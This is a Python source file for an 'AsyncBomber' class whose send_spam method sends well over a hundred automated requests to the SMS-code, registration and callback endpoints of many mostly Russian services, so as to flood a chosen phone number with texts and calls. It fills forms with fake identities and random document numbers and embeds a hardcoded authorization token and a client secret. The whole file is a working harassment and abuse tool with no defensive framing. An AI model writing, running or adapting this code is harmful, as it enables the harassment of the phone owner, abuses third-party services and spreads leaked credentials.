import aiohttp,asyncio
from random import randint
class AsyncBomber():
	def __init__(self):
			self.session = aiohttp.ClientSession()
			self.headers={"user-agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36","x-requested-with": "XMLHttpRequest"}
	def __del__(self):
			try:
			          loop = asyncio.get_event_loop()
			          loop.create_task(self._close_session())
			except RuntimeError:
			          loop = asyncio.new_event_loop()
			          loop.run_until_complete(self._close_session())
	async def _close_session(self):
			if not self.session.closed: await self.session.close()
	async def send_spam(self,phone,country_code,name ="123XCVBhvcvbbNM",password ="123dhbdbdbbx",email ="123XCVBhvcvbbNM@gmail.com"):
			await self.session.post("https://youla.ru/web-api/auth/request_code",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://cabinet.wi-fi.ru/api/auth/by-sms", data={"msisdn": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://ng-api.webbankir.com/user/v2/create", json={"lastName": "иванов", "firstName": "иван", "middleName": "иванович", "mobilePhone": f"{country_code}{phone}", "email": email, "smsCode": ""}, headers=self.headers)
			await self.session.post("https://shop.vsk.ru/ajax/auth/postSms/", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://passport.twitch.tv/register?trusted_request=true", json={"birthday": {"day": 11, "month": 11, "year": 1999}, "client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp", "include_verification_code": True, "password": password, "phone_number": f"{country_code}{phone}", "username": name}, headers=self.headers)
			await self.session.post("https://b.utair.ru/api/v1/login/", json={"login": f"{country_code}{phone}", "confirmation_type": "call_code"}, headers=self.headers)
			await self.session.post("https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru", data={"phone_number": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://thehive.pro/auth/signup", json={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post(f"https://msk.tele2.ru/api/validation/number/{phone}", json={"sender": "Tele2"}, headers=self.headers)
			await self.session.post("https://tabasko.su/", data={"IS_AJAX": "Y", "COMPONENT_NAME": "AUTH", "ACTION": "GET_CODE", "LOGIN": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://sushifuji.ru/sms_send_ajax.php", data={"name": "false", "phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://api.sunlight.net/v3/customers/authorization/", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.get("https://suandshi.ru/mobile_api/register_mobile_user", params={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php", data={"demo_number": "+" +f"{country_code}{phone}", "ajax_demo_send": "1"}, headers=self.headers)
			await self.session.post("https://shopandshow.ru/sms/password-request/", data={"phone": "+" +f"{country_code}{phone}", "resend": 0}, headers=self.headers)
			await self.session.post("https://sayoris.ru/?route=parse/whats", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://pass.rutube.ru/api/accounts/phone/send-password/", json={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://richfamily.ru/ajax/sms_activities/sms_validate_phone.php", data={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.get("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code", params={"number": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://qlean.ru/clients-api/v2/sms_codes/auth/request_code", json={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://pizzakazan.com/auth/ajax.php", data={"phone": "+" +f"{country_code}{phone}", "method": "sendCode"}, headers=self.headers)
			await self.session.post("https://piroginomerodin.ru/index.php?route=sms/login/sendreg", data={"telephone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry", json={"phone": f"{country_code}{phone}", "otpId": 0}, headers=self.headers)
			await self.session.post("https://ok.ru/dk?cmd=AnonymRegistrationEnterPhone&st.cmd=anonymRegistrationEnterPhone", data={"st.r.phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://nn-card.ru/api/1.0/covid/login", json={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://www.niyama.ru/ajax/sendSMS.php", data={"REGISTER[PERSONAL_PHONE]": f"{country_code}{phone}", "code": "", "sendsms": "Выслать код"}, headers=self.headers)
			await self.session.post("https://account.my.games/signup_send_sms/", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code", params={"msisdn": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php", data={"name": name, "phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://moneyman.ru/registration_api/actions/send-confirmation-code", data="+" +f"{country_code}{phone}", headers=self.headers)
			await self.session.post("https://my.modulbank.ru/api/v2/registration/nameAndPhone", json={"FirstName": name, "CellPhone": f"{country_code}{phone}", "Package": "optimal"}, headers=self.headers)
			await self.session.get("https://menza-cafe.ru/system/call_me.php", params={"fio": name, "phone": f"{country_code}{phone}", "phone_number": "1"}, headers=self.headers)
			await self.session.post("https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php", data={"data": f"{country_code}{phone}", "metod": "postreg"}, headers=self.headers)
			await self.session.post("https://api-rest.logistictech.ru/api/v1.1/clients/request-code", json={"phone": f"{country_code}{phone}"}, headers={"Restaurant-chain": "c0ab3d88-fba8-47aa-b08d-c7598a3be0b9", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"})
			await self.session.post("https://lenta.com/api/v1/authentication/requestValidationCode", json={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://koronapay.com/transfers/online/api/users/otps", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://kaspi.kz/util/send-app-link", data={"address": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://api.ivi.ru/mobileapi/user/register/phone/v6", data={"phone": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2", headers={"Referer": "https://www.ingos.ru/cabinet/registration/personal", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36"}, json={"Birthday": "1986-07-10T07:19:56.276+02:00", "DocIssueDate": "2004-02-05T07:19:56.276+02:00", "DocNumber": randint(500000, 999999), "DocSeries": randint(5000, 9999), "FirstName": name, "Gender": "M", "LastName": name, "SecondName": name, "Phone": f"{country_code}{phone}", "Email": email})
			await self.session.post("https://terra-1.indriverapp.com/api/authorization?locale=ru", data={"mode": "request", "phone": "+" +f"{country_code}{phone}", "phone_permission": "unknown", "stream_id": 0, "v": 3, "appversion": "3.20.6", "osversion": "unknown", "devicemodel": "unknown"}, headers=self.headers)
			await self.session.post("https://api.imgur.com/account/v1/phones/verify", json={"phone_number": f"{country_code}{phone}", "region_code": "RU"}, headers=self.headers)
			await self.session.post("https://www.icq.com/smsreg/requestPhoneValidation.php", data={"msisdn": f"{country_code}{phone}", "locale": "en", "countryCode": "ru", "version": "1", "k": "ic1rtwz1s1Hj1O0r", "r": "46763"}, headers=self.headers)
			await self.session.get("https://api.hmara.tv/stable/entrance", params={"contact": f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://helsi.me/api/healthy/accounts/login", json={"phone": f"{country_code}{phone}", "platform": "PISWeb"}, headers=self.headers)
			await self.session.post("https://www.hatimaki.ru/register/", data={"REGISTER[LOGIN]": f"{country_code}{phone}", "REGISTER[PERSONAL_PHONE]": f"{country_code}{phone}", "REGISTER[SMS_CODE]": "", "resend-sms": "1", "REGISTER[EMAIL]": "", "register_submit_button": "Зарегистрироваться"}, headers=self.headers)
			await self.session.get("https://foodband.ru/api/", params={"call": "customers/sendVerificationCode", "phone": f"{country_code}{phone}", "g-recaptcha-response": ""}, headers=self.headers)
			await self.session.post("https://fix-price.ru/ajax/register_phone_code.php", data={"register_call": "Y", "action": "getCode", "phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.get("https://findclone.ru/register", params={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://www.etm.ru/cat/runprog.html", data={"m_phone": f"{country_code}{phone}", "mode": "sendSms", "syf_prog": "clients-services", "getSysParam": "yes"}, headers=self.headers)
			await self.session.post("https://vladimir.edostav.ru/site/CheckAuthLogin", data={"phone_or_email": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://api.delitime.ru/api/v2/signup", data={"SignupForm[username]": f"{country_code}{phone}", "SignupForm[device_type]": 3}, headers=self.headers)
			await self.session.post("https://clients.cleversite.ru/callback/run.php", data={"siteid": "62731", "num": f"{country_code}{phone}", "title": "Онлайн-консультант", "referrer": "https://m.cleversite.ru/call"}, headers=self.headers)
			await self.session.post(f"https://www.citilink.ru/registration/confirm/phone/+{phone}/", headers=self.headers)
			await self.session.post("https://api.cian.ru/sms/v1/send-validation-code/", json={"phone": "+" +f"{country_code}{phone}", "type": "authenticateCode"}, headers=self.headers)
			await self.session.post("https://app.benzuber.ru/login", data={"phone": "+" +f"{country_code}{phone}"}, headers=self.headers)
			await self.session.post("https://bamper.by/registration/?step=1", data={"phone": "+" +f"{country_code}{phone}", "submit": "Запросить смс подтверждения", "rules": "on"}, headers=self.headers)
			await self.session.post("https://cinema5.ru/api/phone_code",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.dns-shop.ru/order/order-single-page/check-and-initiate-phone-confirmation/",params={"phone": f"+{country_code}{phone}", "is_repeat": 0, "order_guid": 1},headers=self.headers)
			await self.session.post("https://www.finam.ru/api/smslocker/sendcode",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://ginzadelivery.ru/v1/auth",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.hatimaki.ru/register/",json={"REGISTER[LOGIN]": f"+{country_code}{phone}","REGISTER[PERSONAL_PHONE]": f"+{country_code}{phone}","REGISTER[SMS_CODE]": "","resend-sms": "1","REGISTER[EMAIL]": "","register_submit_button": "Зарегистрироваться"},headers=self.headers)
			await self.session.post("https://helsi.me/api/healthy/accounts/login",json={"phone": f"+{country_code}{phone}", "platform": "PISWeb"},headers=self.headers)
			await self.session.post("https://api.hmara.tv/stable/entrance",params={"contact": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://ievaphone.com/call-my-phone/web/request-free-call",params={"phone": f"+{country_code}{phone}","domain": "IEVAPHONE","browser": "undefined"},headers=self.headers)
			await self.session.post("https://api.imgur.com/account/v1/phones/verify",json={"phone_number": f"+{country_code}{phone}", "region_code": "RU"},headers=self.headers)
			await self.session.post("https://terra-1.indriverapp.com/api/authorization?locale=ru",json={"mode": "request","phone": f"+{country_code}{phone}","phone_permission": "unknown","stream_id": 0,"v": 3,"appversion": "3.20.6","osversion": "unknown","devicemodel": "unknown"},headers=self.headers)
			await self.session.post("https://pass.rutube.ru/api/accounts/user-exists/",params = {'phone': f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.ingos.ru/api/v1/lk/auth/register/fast/step2",json={"Birthday": "1986-07-10T07:19:56.276+02:00","DocIssueDate": "2004-02-05T07:19:56.276+02:00","DocNumber": randint(500000, 999999),"DocSeries": randint(5000, 9999),"FirstName": "Александр","Gender": "M","LastName": "Александр","SecondName": "Александр","Phone": f"+{country_code}{phone}","Email": email},headers={"Referer": "https://www.ingos.ru/cabinet/registration/personal",'User-Agent':self.headers['user-agent'], 'DNT':'1'})
			await self.session.post("https://lk.invitro.ru/sp/mobileApi/createUserByPassword",json={"password": name,"application": "lkp","login": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://i-want.ru/api/auth/v1/customer/login/phone",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post(f'https://bigd.host/Settings/SendPhoneVerificationCodeAjax?phoneNumber=+{country_code}{phone}',headers=self.headers)
			await self.session.post("https://carte.by/auth/",json={'ajax':'register', 'login':name, 'pass':name, 'phone':f"+{country_code}{phone}", 'company':0, 'resend':1, 'checksum':504},headers=self.headers)
			await self.session.post("https://delivio.by/be/api/user/check", json={"phone":f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.360.by/ajax/sendActivationStep",json={'phone':f"+{country_code}{phone}", 'step':'phone_validate'},headers=self.headers)
			await self.session.post('https://www.eshko.by/orders/create/free_download',json={'kurs':'1', 'iname':"Александр", 'fname':"Александр", 'email':email,'phone':f"+{country_code}{phone}"},headers=self.headers)
			await self.session.get(f'https://findclone.ru/register?phone=+{country_code}{phone}',headers=self.headers)
			await self.session.post('https://lk.esk-ural.ru/application/v3/user/registration-validation',json={"phone":f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://bamper.by/registration/?step=1",json={"phone": f"+{country_code}{phone}","submit": "Запросить смс подтверждения","rules": "on"},headers=self.headers)
			await self.session.post("https://myapi.beltelecom.by/api/v1/auth/check-phone?lang=ru",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://api.boosty.to/oauth/phone/authorize",json={"client_id": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://mobile-api.qiwi.com/oauth/authorize",json={'response_type': 'urn:qiwi:oauth:response-type:confirmation-id', 'name': f"+{country_code}{phone}", 'client_id': 'android-qw', 'client_secret': 'zAm4FKq9UnSe7id'},headers=self.headers)
			await self.session.post("https://my.telegram.org/auth/send_password",data=f"phone=+{country_code}{phone}",headers=self.headers)
			await self.session.post("https://callmyphone.org/do-call",json={"phone": f"+{country_code}{phone}", "browser": "undefined"},headers=self.headers)
			await self.session.post("https://clients.cleversite.ru/callback/run.php",json={"siteid": "62731","num": f"+{country_code}{phone}","title": "Онлайн-консультант","referrer": "https://m.cleversite.ru/call"},headers=self.headers)
			await self.session.post("https://api.delitime.ru/api/v2/signup",json={
"SignupForm[name]": f"+{country_code}{phone}",
"SignupForm[device_type]": 3},headers=self.headers)
			await self.session.post("https://vladimir.edostav.ru/site/CheckAuthLogin",json={"phone_or_email": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://e-groshi.com/online/reg",json={"first_name": "Александр","last_name": "Александр","third_name": "Александр","phone": f"+{country_code}{phone}","password": name,"password2": name},headers=self.headers)
			await self.session.post("https://esh-derevenskoe.ru/index.php?route=checkout/checkout_ajax/sendcode&ajax=yes",json={"need_reg": "1", "phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.etm.ru/cat/runprog.html",json={"m_phone": f"+{country_code}{phone}","mode": "sendSms","syf_prog": "clients-services","getSysParam": "yes"},headers=self.headers)
			await self.session.post("https://fix-price.ru/ajax/register_phone_code.php",json={"register_call": "Y","action": "getCode","phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://friendsclub.ru/assets/components/pl/connector.php",json={"casePar": "authSendsms", "MobilePhone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://plink.tech/register/", json={'phone': f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://ube.pmsm.org.ru/esb/iqos-phone/validate", json={'phone': f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://moscow.rutaxi.ru/ajax_keycode.html", json={'1': f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://p.grabtaxi.com/api/passenger/v2/profiles/register', json={'phoneNumber': f"+{country_code}{phone}", 'countryCode': 'ID', 'name': name, 'email': email, 'deviceToken': '*'},headers=self.headers)
			await self.session.post("https://panda99.ru/bdhandlers/order.php?t={int(time())}",json={
"CB_NAME": "Александр",
"CB_PHONE": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.smsint.ru/bitrix/templates/sms_intel/include/ajaxRegistrationTrigger.php",json={'name':name ,'phone': f"+{country_code}{phone}", 'promo': 'yellowforma'},headers=self.headers)
			await self.session.post("https://eda.yandex/api/v1/user/request_authentication_code", json={"phone_number": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://ng-api.webbankir.com/user/v2/create",json={"lastName": "Александр","firstName": "Александр","middleName": "Александр","mobilePhone": f"+{country_code}{phone}","email": email,"smsCode": ""},headers=self.headers)
			await self.session.post("https://shop.vsk.ru/ajax/auth/postSms/",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.get("https://vezitaxi.com/api/employment/getsmscode",params={"phone": f"+{country_code}{phone}","city": 561,"callback": "jsonp_callback_35979"},headers=self.headers)
			await self.session.post("https://b.utair.ru/api/v1/login/",json={"login": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://app.doma.uchi.ru/api/v1/parent/signup_start",json={"phone": f"+{country_code}{phone}","first_name": "-","utm_data": {},"via": "sms"},headers=self.headers)
			await self.session.post("https://app.doma.uchi.ru/api/v1/parent/signup_start",json={"phone": f"+{country_code}{phone}","first_name": "-","utm_data": {},"via": "call"},headers=self.headers)
			await self.session.post("https://online.sbis.ru/reg/service/", json={'firstName':'паша','middleName': "Александр",'lastName': "Александр",'sex':'1','birthDate':'7.9.1997','mobilePhone': f"+{country_code}{phone}",'russianFederationResident':'true','isDSA':'false','personalDataProcessingAgreement':'true','bKIRequestAgreement':'null','promotionAgreement':'true'},headers=self.headers)
			await self.session.post("https://passport.twitch.tv/register?trusted_request=true",json={
"birthday": {"day": 19, "month": 3, "year": 1988},"client_id": "kd1unb4b3q4t58fwlpcbzcbnm76a8fp","include_verification_code": True,"password": name,"phone_number": f"+{country_code}{phone}","name": name},headers=self.headers)
			await self.session.post("https://thehive.pro/auth/signup",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://msk.tele2.ru/api/validation/number/{country_code}{phone}",json={"sender": "Tele2"},headers=self.headers)
			await self.session.post("https://taxi-ritm.ru/ajax/ppp/ppp_back_call.php?URL=/",json={"RECALL": "Y", "BACK_CALL_PHONE": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://tabasko.su/",json={"IS_AJAX": "Y","COMPONENT_NAME": "AUTH","ACTION": "GET_CODE","LOGIN": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.sushi-profi.ru/api/order/order-call/",json={"phone": f"+{country_code}{phone}", "name": "Александр"},headers=self.headers)
			await self.session.post("https://sushifuji.ru/sms_send_ajax.php",json={"name": "false", "phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post(f"https://www.oyorooms.com/api/pwa/generateotp?phone={country_code}{phone}&country_code=%2B7&nod=4&locale=en",headers=self.headers)
			await self.session.post("https://www.sms4b.ru/bitrix/components/sms4b/sms.demo/ajax.php",json={"demo_number": f"+{country_code}{phone}", "ajax_demo_send": "1"},headers=self.headers)
			await self.session.post("https://deathstar.signal.is/auth",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://shopandshow.ru/sms/password-request/",json={"phone": f"+{country_code}{phone}", "resend": 0},headers=self.headers)
			await self.session.post("https://sayoris.ru/?route=parse/whats",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://pass.rutube.ru/api/accounts/phone/send-password/",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://rutaxi.ru/ajax_auth.html", json={"l": f"+{country_code}{phone}", "c": "3"},headers=self.headers)
			await self.session.post("https://oapi.raiffeisen.ru/api/sms-auth/public/v1.0/phone/code",params={"number": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://pizzasinizza.ru/api/phoneCode.php", json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.ozon.ru/api/composer-api.bx/_action/fastEntry",json={"phone": f"+{country_code}{phone}", "otpId": 0},headers=self.headers)
			await self.session.post("https://okeansushi.ru/includes/contact.php",params={"call_mail": "1","ajax": "1","name": "Александр","phone": f"+{country_code}{phone}","call_time": "1","pravila2": "on"},headers=self.headers)
			await self.session.post("https://nn-card.ru/api/1.0/register",json={"phone": f"+{country_code}{phone}", "password": name},headers=self.headers)
			await self.session.post("https://www.niyama.ru/ajax/sendSMS.php",json={"REGISTER[PERSONAL_PHONE]": f"+{country_code}{phone}","code": "","sendsms": "Выслать код"},headers=self.headers)
			await self.session.post("https://prod.tvh.mts.ru/tvh-public-api-gateway/public/rest/general/send-code",params={"msisdn": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://www.kant.ru/ajax/profile/send_authcode.php",json={"Phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://kaspi.kz/util/send-app-link", json={"address": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://koronapay.com/transfers/online/api/users/otps",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://lenta.com/api/v1/authentication/requestValidationCode",json={"phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://mos.pizza/bitrix/components/custom/callback/templates/.default/ajax.php",json={"name": "Александр", "phone": f"+{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://moneyman.ru/registration_api/actions/send-confirmation-code",data=f"+{country_code}{phone}",headers=self.headers)
			await self.session.post("https://my.modulbank.ru/api/v2/registration/nameAndPhone",json={"FirstName": "Александр","CellPhone": f"+{country_code}{phone}","Package": "optimal"},headers=self.headers)
			await self.session.get("https://menza-cafe.ru/system/call_me.php",params={"fio": "Александр","phone": f"+{country_code}{phone}","phone_number": "1"},headers=self.headers)
			await self.session.post("https://makarolls.ru/bitrix/components/aloe/aloe.user/login_new.php",json={"data": f"+{country_code}{phone}", "metod": "postreg"},headers=self.headers)
			await self.session.post("https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",json={"telephone": "8" + phone},headers=self.headers)
			await self.session.post(f"https://www.citilink.ru/registration/confirm/phone/+{country_code}{phone}/",headers=self.headers)
			await self.session.post("https://piroginomerodin.ru/index.php?route=sms/login/sendreg",json={"telephone": "+" + f"{country_code}{phone}"},headers=self.headers)
			await self.session.post("https://pizzakazan.com/auth/ajax.php",json={"phone": "+" + f"{country_code}{phone}", "method": "sendCode"},headers=self.headers)
			await self.session.post("https://api.sunlight.net/v3/customers/authorization/",json={"phone": f"{country_code}{phone}"},headers=self.headers)
			await self.session.get(f'https://www.farpost.ru/sign/confirm?sessionGeoId=0&sign={country_code}{phone}&entrance=&registration=ok&ts=1606751018',headers=self.headers)
			await self.session.post('https://www.remontnik.ru/api/v2/register/step_10/',json={"name":"Александр","email":email,"phone":f"{country_code}{phone}","social":"false","time_zone":-180,"screen_size":"2048×1080x24","system_fonts":"Arial, Arial Narrow, Bitstream Vera Sans Mono, Bookman Old Style, Century Schoolbook, Courier, Courier New, Helvetica, Palatino, Palatino Linotype, Times, Times New Roman","supercookie":"DOM localStorage, DOM sessionStorage"},headers=self.headers)
			await self.session.post("https://rutaxi.ru/ajax_auth.html",json={"l": phone, "c": "3"},headers=self.headers)
			await self.session.post('https://farmakopeika.ru/local/ajax/forms/re_call_form.php',json={'WEB_FORM_ID':1, 'sessid':'47ea89r6ca1b105894td0eea3a4e5f0g', 'phone':phone, 'name':name},headers=self.headers)
			await self.session.get(f'https://vladimir.vilkinet.ru/runtime/sendpass/?phone={phone}',headers=self.headers)
			await self.session.get(f'https://beeline.kz/restservices/telco/auth/{phone}/checkexists',headers=self.headers)
			await self.session.post('https://id.ykt.ru/api/v3/register/sendCode', json={'phone': phone},headers=self.headers)
			await self.session.post("https://www.panpizza.ru/index.php?route=account/customer/sendSMSCode",json={"telephone": "8" + phone},headers=self.headers)
			await self.session.post('https://www.utair.ru/mobile/api/v8/user/login', json = {'login': f"{country_code}{phone}", 'confirmationType': "callCode"}, headers = {'Authorization': 'Token eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqdGkiOiI1NjkzIiwic2NvcGVzIjpbInVzZXIucHJvZmlsZSIsInVzZXIucHJvZmlsZS5lZGl0IiwidXNlci5wcm9maWxlLnJlcmVnaXN0cmF0aW9uIiwidXNlci5ib251cyIsInVzZXIucGF5bWVudHMuY2FyZHMiLCJ1c2VyLnJlZmVycmFscyIsInVzZXIuc3lzdGVtLmZlZWRiYWNrIiwidXNlci5jb21wYW55IiwidXNlci5leHBlcmVtZW50YWwucnpkIiwiYXBwLnVzZXIucmVnaXN0cmF0aW9uIiwiYXBwLmJvbnVzIiwiYXBwLmJvb2tpbmciLCJhcHAuY2hlY2tpbiIsImFwcC5haXJwb3J0cyIsImFwcC5jb3VudHJpZXMiLCJhcHAudG91cnMiLCJhcHAucHJvbW8iLCJhcHAuc2NoZWR1bGUiLCJhcHAucHJvbW8ucHJlcGFpZCIsImFwcC5zeXN0ZW0uZmVlZGJhY2siLCJhcHAuc3lzdGVtLnRyYW5zYWN0aW9ucyIsImFwcC5zeXN0ZW0ucHJvZmlsZSIsImFwcC5zeXN0ZW0udGVzdC5hY2NvdW50cyIsImFwcC5zeXN0ZW0ubGlua3MiLCJhcHAuc3lzdGVtLm5vdGlmaWNhdGlvbiIsImFwcC5kYWRhdGEiLCJhcHAuYWIiLCJhcHAuY29tcGFueSIsImFwcC5zZXJ2aWNlcyJdLCJleHAiOjE2NDExODIzNDh9.crO5rLAZ1btPDgplxCVPjx9NtO_nHB7I83Gyf1QYeGE','User-Agent': 'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.1.153 Yowser/2.5 Safari/537.36'})
			await self.session.post('https://www.utair.ru/mobile/api/v8/account/profile', json = {'login': f"{country_code}{phone}", 'confirmationGDPRDate': '1609647178956'}, headers = {'Authorization': 'Token eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJqdGkiOiI1NjkzIiwic2NvcGVzIjpbInVzZXIucHJvZmlsZSIsInVzZXIucHJvZmlsZS5lZGl0IiwidXNlci5wcm9maWxlLnJlcmVnaXN0cmF0aW9uIiwidXNlci5ib251cyIsInVzZXIucGF5bWVudHMuY2FyZHMiLCJ1c2VyLnJlZmVycmFscyIsInVzZXIuc3lzdGVtLmZlZWRiYWNrIiwidXNlci5jb21wYW55IiwidXNlci5leHBlcmVtZW50YWwucnpkIiwiYXBwLnVzZXIucmVnaXN0cmF0aW9uIiwiYXBwLmJvbnVzIiwiYXBwLmJvb2tpbmciLCJhcHAuY2hlY2tpbiIsImFwcC5haXJwb3J0cyIsImFwcC5jb3VudHJpZXMiLCJhcHAudG91cnMiLCJhcHAucHJvbW8iLCJhcHAuc2NoZWR1bGUiLCJhcHAucHJvbW8ucHJlcGFpZCIsImFwcC5zeXN0ZW0uZmVlZGJhY2siLCJhcHAuc3lzdGVtLnRyYW5zYWN0aW9ucyIsImFwcC5zeXN0ZW0ucHJvZmlsZSIsImFwcC5zeXN0ZW0udGVzdC5hY2NvdW50cyIsImFwcC5zeXN0ZW0ubGlua3MiLCJhcHAuc3lzdGVtLm5vdGlmaWNhdGlvbiIsImFwcC5kYWRhdGEiLCJhcHAuYWIiLCJhcHAuY29tcGFueSIsImFwcC5zZXJ2aWNlcyJdLCJleHAiOjE2NDExODIzNDh9.crO5rLAZ1btPDgplxCVPjx9NtO_nHB7I83Gyf1QYeGE','User-Agent':'Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 YaBrowser/19.6.1.153 Yowser/2.5 Safari/537.36'})
			await self.session.post('https://zaim.bistrodengi.ru/sdo/user/loginLK',json = {'name': "Арсений Анатольевич", 'phoneNumber': f"{country_code}{phone}", 'birthDate': "1984-01-04"},headers=self.headers)
			await self.session.post('https://haraba.ru/Account/Register',json= {'phone': f"{country_code}{phone}",'pass1': 'Myp-Vbq-RbE-zvH','pass2': 'Myp-Vbq-RbE-zvH','ip': None,'type': 1,'company': None},headers=self.headers)
			await self.session.post("https://www.icq.com/smsreg/requestPhoneValidation.php",json={"msisdn": f"{country_code}{phone}","locale": "en","countryCode": "ru","version": "1","k": "ic1rtwz1s1Hj1O0r","r": "46763"},headers=self.headers)
			await self.session.post('https://smsint.ru/bitrix/templates/sms_intel/ajax/registration.php',json={'phone':f"{country_code}{phone}", 'name':"Александр", 'code':' ', 'fpc':'null'},headers=self.headers)
			await self.session.post('https://n17459.yclients.com/api/v1/book_code/26760',json={'phone': f"{country_code}{phone}"},headers=self.headers)
			await self.session.post('https://passport.twitch.tv/register?trusted_request=true', json={'birthday': {'day': 1, 'month': 9, 'year': 1997}, 'client_id': 'kd1unb4b3q4t58fwlpcbzcbnm76a8fp', 'include_verification_code': True, 'password': name, 'phone_number': f"{country_code}{phone}", 'username': name},headers=self.headers)
